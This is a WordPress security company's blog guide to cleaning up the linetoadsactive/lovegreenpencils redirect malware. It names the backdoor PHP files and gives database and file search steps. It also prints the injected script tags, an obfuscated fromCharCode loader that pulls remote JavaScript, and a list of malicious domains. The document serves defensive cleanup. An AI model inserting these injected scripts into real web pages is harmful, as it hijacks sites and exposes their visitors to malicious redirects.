For the love of God make it stop..how to remove the linetoadsactive redirect (and others)
*UPDATE – If you would like one of our WordPress professionals to remove this for you, give us a call at (844) 939-2704 or hit the chat button on this page.
You’re probably here because your WordPress site (or even worse, your client’s WordPress site) is redirecting/timing out and you’ve found the culprit to be linetoadsactive.com or lovegreenpencils.ga. Maybe you removed some of the malicious index.php files that were generated or injected with the code, but still can’t get it to stop redirecting, and are about to quietly close your laptop, turn off your phone and walk off into the sunset. Rest assured weary web developer, it can be defeated.
This is an especially annoying, multifaceted hack that can infect your entire server. We have found instances of this malware that are so thorough that the malicious code is injected into hundreds of php files AND database entries, in every WordPress install on the server. You’ll need to preform these steps on every WordPress site on your server to be sure that it has been eliminated.
This guide assumes that you are a web developer and have familiarity with SSH, phpmyadmin, have backed up your site, and are proficient enough to restore your site if something goes wrong during the removal – so please use this information at your own risk. If you would like one of our WordPress professionals to remove this for you, give us a call at (844) 939-2704 or hit the chat button on this page.
1. Remove the backdoor
In most of the cases we’ve seen, this hack comes from unlicensed/unofficial or pirated WordPress plugins that bundle the following php files that are used as a back door to gain entry to your site:
rms-script-ini.php
rms-script-mu-plugin.php
rms_unique_wp_mu_pl_fl_nm.php
The first step is to search your server for every instance of these files and remove them, and any lines of code in any files that reference them. Note that if anyone visits your site, the files will be regenerated unless you remove all 3 of them – so you’ll need to double check at the end of this process that they are still gone after deleting them.
* A word of caution – removing these 3 files may cause wordpress to give a critical error, because the compromised plugins they were bundled with will still be trying to call them. You must either replace the plugin in question with the proper licensed version from the vendor, remove the code from the plugin’s files that references the above files, or disable the plugin completely to avoid this scenario.
2. Search the database for injected redirect script
This dastardly redirect not only infects php files but also injects the redirection script into your WordPress database. You need to login to phpmyadmin and search your wp database for the strings “linetoadsactive” or “lovegreenpencils” depending on which one your site is redirecting to. You will likely get many results in wp_posts, as well as your site’s URL setting in wp_options. The first step is to restore your site’s URL in the wp_options tables. Then copy the string that was found in your wp_posts table, which should look something like this:
<script type=’text/javascript’ src=’https://trend.linetoadsactive.com/m.js?n=ns1′></script>
Now do a SQL search & replace for all instances of the string you found, replacing it with nothing. Remember to do this for every wordpress installation on your server.
3. Search php & html files for malicious code
Now you need to use ssh commands to search for “linetoadsactive” and “lovegreenpencils” in all of your php & html files. The results you get should look similar to the code injected into your database, but possibly with a different string at the end:
<script type=’text/javascript’ src=’https://trend.linetoadsactive.com/m.js?n=nb5′></script>
Now do a search and replace of all php & html files, replacing this string with nothing.
But you’re not done yet – this hateful little script has also injected obfuscated code that will still cause your site to redirect. Do another ssh search for all php & html files containing “115,99,114,105,112,116”. You will get something like this:
<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,101,110,100,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>
This is just obfuscated code that loads the same scripts above.
4. Final steps
As I’ve mentioned before, you need to repeat these steps on every WordPress installation on your server. If you have any that are just sitting there inactive, now is a good time to delete them. Also go back to step 1 and make sure that the 3 php files have not reappeared – if they have, delete them again, visit your site again in a private window, and check to see if they have reappeared. If they have, you haven’t successfully removed the backdoor.
If you would like one of our WordPress professionals to remove this redirect for you, give us a call at (844) 939-2704 or hit the chat button on this page.
List of URL’s associated with this malware
https://well.linetoadsactive.com/det.php
https://done.linetoadsactive.com/go.php
https://live.linetoadsactive.com/go.php
https://trend.linetoadsactive.com/go.php
https://trend.linetoadsactive.com/m.js?n=nb5
https://trend.linetoadsactive.com/m.js?n=ns1
https://boliverfernanrdos.ga/?p=hfqwmzrrmu5gi3bpguydgni
https://boliverfernanrdos.ga/w_31.js
https://load7.biz/sw/w1s.js
https://dock.lovegreenpencils.ga/m.js?n=nb5
https://cht.secondaryinformtrand.com/m.js?n=nb5
default7.com
test246.com
test0.com
distinctfestive.com
ableoccassion.com
https://djengysdaro.com
